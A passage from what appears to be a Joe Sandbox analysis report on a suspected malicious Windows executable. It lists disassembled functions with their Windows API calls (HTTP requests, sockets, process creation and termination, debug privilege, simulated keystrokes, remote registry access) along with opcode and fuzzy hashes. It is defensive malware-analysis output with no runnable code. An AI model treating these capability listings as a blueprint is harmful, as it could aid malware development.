                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00CCEB0E
                                • ImageList_EndDrag.COMCTL32 ref: 00CCEB14
                                • ReleaseCapture.USER32 ref: 00CCEB1A
                                • SetWindowTextW.USER32(?,00000000), ref: 00CCEBC2
                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CCEBD5
                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00CCECAE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                • API String ID: 1924731296-2107944366
                                • Opcode ID: ced4259ce4cef4c11431b05e5a59dced1ef72b102742a14e81277c58befcff19
                                • Instruction ID: 118425ef755120d8fa35525d2553f94daa074fc74b95424ae1545ac6dcbb8a09
                                • Opcode Fuzzy Hash: ced4259ce4cef4c11431b05e5a59dced1ef72b102742a14e81277c58befcff19
                                • Instruction Fuzzy Hash: A551CD74204304AFD714EF24DC96F6A7BE5FB98704F008A2DF596972E2CB709905EB62
                                Function 00CB4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB4C5E
                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CB4C8A
                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CB4CCC
                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CB4CE1
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB4CEE
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CB4D1E
                                • InternetCloseHandle.WININET(00000000), ref: 00CB4D65
                                  • Part of subcall function 00CB56A9: GetLastError.KERNEL32(?,?,00CB4A2B,00000000,00000000,00000001), ref: 00CB56BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                • String ID:
                                • API String ID: 1241431887-3916222277
                                • Opcode ID: b9532930898c01346c35a76ec0dc7a3caf9b7af86a2abc67ece5098b4cc2fd41
                                • Instruction ID: 1bde23bcd609b7665d66e680a125d0aea5d79173b8f5c768f97c46c1a008b85e
                                • Opcode Fuzzy Hash: b9532930898c01346c35a76ec0dc7a3caf9b7af86a2abc67ece5098b4cc2fd41
                                • Instruction Fuzzy Hash: A1419DB1505618BFEB169F60CC89FFF7BACEF08714F10411AFA119A196DB709E449BA0
                                Function 00CBBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CFDBF0), ref: 00CBBBA1
                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CFDBF0), ref: 00CBBBD5
                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CBBD33
                                • SysFreeString.OLEAUT32(?), ref: 00CBBD5D
                                • StringFromGUID2.OLE32(?,?,00000028,?,00CFDBF0), ref: 00CBBEAD
                                • ProgIDFromCLSID.OLE32(?,?,?,00CFDBF0), ref: 00CBBEF7
                                • CoTaskMemFree.OLE32(?,?,?,00CFDBF0), ref: 00CBBF14
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                • String ID:
                                • API String ID: 793797124-0
                                • Opcode ID: 949d563b21a3e14cf69df1f21554ade1aaeafa392c5a2b02802eb0b578affb79
                                • Instruction ID: 0b267f27db8fffbae46935d6bb181e793619e81a563bb0c6f6f18590055d34e3
                                • Opcode Fuzzy Hash: 949d563b21a3e14cf69df1f21554ade1aaeafa392c5a2b02802eb0b578affb79
                                • Instruction Fuzzy Hash: CAF10875A00109EFCB14DFA4C884EEEB7B9FF89314F108459F916AB251DB71AE42DB90
                                Function 00CC23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CC23E6
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CC2579
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CC259D
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CC25DD
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CC25FF
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CC2760
                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CC2792
                                • CloseHandle.KERNEL32(?), ref: 00CC27C1
                                • CloseHandle.KERNEL32(?), ref: 00CC2838
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                • String ID:
                                • API String ID: 4090791747-0
                                • Opcode ID: 173697e4db0052f2178023bb54b791202dcb6ad36468c35668e44f33291b5002
                                • Instruction ID: 0287b9a2c6010515682ed43f6982c57ba4344c5011cf3f5a8b031645b18755a4
                                • Opcode Fuzzy Hash: 173697e4db0052f2178023bb54b791202dcb6ad36468c35668e44f33291b5002
                                • Instruction Fuzzy Hash: 84D1AD31604301DFCB24EF24C891B6EBBE5AF85324F18845DF89A9B2A2DB31DD45DB52
                                Function 00CB9A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WSOCK32 ref: 00CB9B38
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9B45
                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00CB9B6F
                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CB9B90
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB9B9F
                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00CB9C51
                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00CFDBF0), ref: 00CB9C0C
                                  • Part of subcall function 00C9E0F5: _strlen.LIBCMT ref: 00C9E0FF
                                  • Part of subcall function 00C9E0F5: _memmove.LIBCMT ref: 00C9E121
                                • _strlen.LIBCMT ref: 00CB9CA7
                                • _memmove.LIBCMT ref: 00CB9D10
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                • String ID:
                                • API String ID: 3637404534-0
                                • Opcode ID: ff3821c2e0cecb4ad302bdb77b987fdc8c5cda3d5418a72d6ec64c9287b0356c
                                • Instruction ID: b3e4de9e7a4590c66e6fd9b8ea8ff46678881b9e947579796c1b8d3560996ff3
                                • Opcode Fuzzy Hash: ff3821c2e0cecb4ad302bdb77b987fdc8c5cda3d5418a72d6ec64c9287b0356c
                                • Instruction Fuzzy Hash: 8F81AE71504240ABC720EF65CC95FABBBE8EF84714F144A1DF6569B2A1DB30DE04DB92
                                Function 00CCB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                Download Yara Rule
                                APIs
                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CCB204
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InvalidateRect
                                • String ID:
                                • API String ID: 634782764-0
                                • Opcode ID: 2c9c367d427fd77073a636f5dacba0841d78e5977e88432212a1d54185da5aea
                                • Instruction ID: aa8ce72ca41c121f602cef65f7dcf0b68e4565f5e88092203a3ab9a23d8ce731
                                • Opcode Fuzzy Hash: 2c9c367d427fd77073a636f5dacba0841d78e5977e88432212a1d54185da5aea
                                • Instruction Fuzzy Hash: EF519130600245BEEF249FA9CCCAF9E7B65EF05320F248519F925D61B1CB71EE509B51
                                Function 00C7A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CDE9EA
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CDEA0B
                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CDEA20
                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CDEA3D
                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CDEA64
                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C7A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CDEA6F
                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CDEA8C
                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C7A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CDEA97
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                • String ID:
                                • API String ID: 1268354404-0
                                • Opcode ID: b9f719c9b36f96e84c066e9e253f735aebe0db3211ff3da82839fca5b240c5ea
                                • Instruction ID: bc0b491f4073360e2b4089286d030ecee4c53edfef01fb0a382a56e28979b200
                                • Opcode Fuzzy Hash: b9f719c9b36f96e84c066e9e253f735aebe0db3211ff3da82839fca5b240c5ea
                                • Instruction Fuzzy Hash: 92516A74600205AFDB20EF65CC81FAE7BB5BB58754F108619FA1A9B290D770ED81AB50
                                Function 00C7F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00C7F737
                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00C7F77E
                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00CDEB55
                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00CDE9A0,00000004,00000000,00000000), ref: 00CDEBC1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 505a83bb067fe0e5df9348a84281fb9238b56bf33e41fb737c3da0fbd7fa8ab2
                                • Instruction ID: 73e788ff6b38b9e547aaff52d2d7e83756a1922c2e45bfc0554512f5ff8fc9aa
                                • Opcode Fuzzy Hash: 505a83bb067fe0e5df9348a84281fb9238b56bf33e41fb737c3da0fbd7fa8ab2
                                • Instruction Fuzzy Hash: 1E412C302046C0EBDB3D5B398CC8B3A7A956B55315F24C82FF1AF8B661C670B942D721
                                Function 00C9CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C9E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9E158
                                  • Part of subcall function 00C9E138: GetCurrentThreadId.KERNEL32 ref: 00C9E15F
                                  • Part of subcall function 00C9E138: AttachThreadInput.USER32(00000000,?,00C9CDFB,?,00000001), ref: 00C9E166
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9CE06
                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C9CE23
                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C9CE26
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9CE2F
                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C9CE4D
                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C9CE50
                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C9CE59
                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C9CE70
                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C9CE73
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                • String ID:
                                • API String ID: 2014098862-0
                                • Opcode ID: 91aefda5ee6837a17560e5d63d86dd271904310896574c10f59dbeba1a073449
                                • Instruction ID: 73f92ee428e4ae3e09eced364b9bf46d56c550e11ea4084fc306f738a2905a5c
                                • Opcode Fuzzy Hash: 91aefda5ee6837a17560e5d63d86dd271904310896574c10f59dbeba1a073449
                                • Instruction Fuzzy Hash: 9E11C4B1550618BFFB106F648CCEF6E7A2DDB587A4F500415F3426F1E0C9F26C419AA4
                                Function 00CBC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: NULL Pointer assignment$Not an Object type
                                • API String ID: 0-572801152
                                • Opcode ID: 665d0f1b619be9068527aa80a0fe12a82c9f862d20992c0a5d5cdf28411f5d08
                                • Instruction ID: 9bcbf4ec4c74c051e0e434a70916ace3e584c2b290c5c8a97349b47b16748406
                                • Opcode Fuzzy Hash: 665d0f1b619be9068527aa80a0fe12a82c9f862d20992c0a5d5cdf28411f5d08
                                • Instruction Fuzzy Hash: F7E1B171A00219AFDF10DFA4C8C5AEE7BB5FF58314F148029F95AAB281D7709E41DBA0
                                Function 00CC9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CC9926
                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CC993A
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CC9954
                                • _wcscat.LIBCMT ref: 00CC99AF
                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CC99C6
                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CC99F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Window_wcscat
                                • String ID: SysListView32
                                • API String ID: 307300125-78025650
                                • Opcode ID: 0a8c69fa57a96b0af12036e5a4e1ef291acce04d2e8395cd3d44751313aae5f6
                                • Instruction ID: a0d0b640de4d7c5c5a094cab22d4aaf0ec538b7ae1c9c4dd349aed5b426dc777
                                • Opcode Fuzzy Hash: 0a8c69fa57a96b0af12036e5a4e1ef291acce04d2e8395cd3d44751313aae5f6
                                • Instruction Fuzzy Hash: C641AF71A00348AFEB219F64C889FEE77A8EF08354F10442AF599E7291D6719A849B60
                                Function 00CC1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CA6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CA6F7D
                                  • Part of subcall function 00CA6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CA6F8D
                                  • Part of subcall function 00CA6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CA7022
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CC168B
                                • GetLastError.KERNEL32 ref: 00CC169E
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CC16CA
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CC1746
                                • GetLastError.KERNEL32(00000000), ref: 00CC1751
                                • CloseHandle.KERNEL32(00000000), ref: 00CC1786
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                • String ID: SeDebugPrivilege
                                • API String ID: 2533919879-2896544425
                                • Opcode ID: 8f06d443e518b1178e92cb82b3765141c62878df2f14ba4de7d3039ffb1d43e0
                                • Instruction ID: d17d9028d2dc8ba1471b34c583aca88d9154468019b795101c94dedf93862dbf
                                • Opcode Fuzzy Hash: 8f06d443e518b1178e92cb82b3765141c62878df2f14ba4de7d3039ffb1d43e0
                                • Instruction Fuzzy Hash: B241ED71600202AFDB04EF65CCE6FADB7A5AF45318F088048F9069F292DBB5E940DB51
                                Function 00CA6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadIconW.USER32(00000000,00007F03), ref: 00CA62D6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID: blank$info$question$stop$warning
                                • API String ID: 2457776203-404129466
                                • Opcode ID: 1fe5f71b63ccc801a29a8808ba475e45698b062bc0022e86deeb4cfadadb4eeb
                                • Instruction ID: 682666b3cecb0aa78e137849ab11ba4d92fef1e0e673b8ffae57a70da1deff2b
                                • Opcode Fuzzy Hash: 1fe5f71b63ccc801a29a8808ba475e45698b062bc0022e86deeb4cfadadb4eeb
                                • Instruction Fuzzy Hash: AD11DD71208347BFD7055B55DC42FBE77DC9F1772CB180129F511A62C2EBB06B415268
                                Function 00CA757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00CA7595
                                • LoadStringW.USER32(00000000), ref: 00CA759C
                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CA75B2
                                • LoadStringW.USER32(00000000), ref: 00CA75B9
                                • _wprintf.LIBCMT ref: 00CA75DF
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA75FD
                                Strings
                                • %s (%d) : ==> %s: %s %s, xrefs: 00CA75DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HandleLoadModuleString$Message_wprintf
                                • String ID: %s (%d) : ==> %s: %s %s
                                • API String ID: 3648134473-3128320259
                                • Opcode ID: ab51255fdfcb2c4395c47af431f3223eb7ae150ead03821eccfa7c4d9f2d8877
                                • Instruction ID: 5a960a8eb0795adc7f4cb5e99be7b05ce3c189798216858aea48b14229afef86
                                • Opcode Fuzzy Hash: ab51255fdfcb2c4395c47af431f3223eb7ae150ead03821eccfa7c4d9f2d8877
                                • Instruction Fuzzy Hash: 900162F2904249BFE711AB949CC9FEA776CD704305F000495B716DA041EA749E848B35
                                Function 00CC2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC2AE7
                                Memory Dump Source
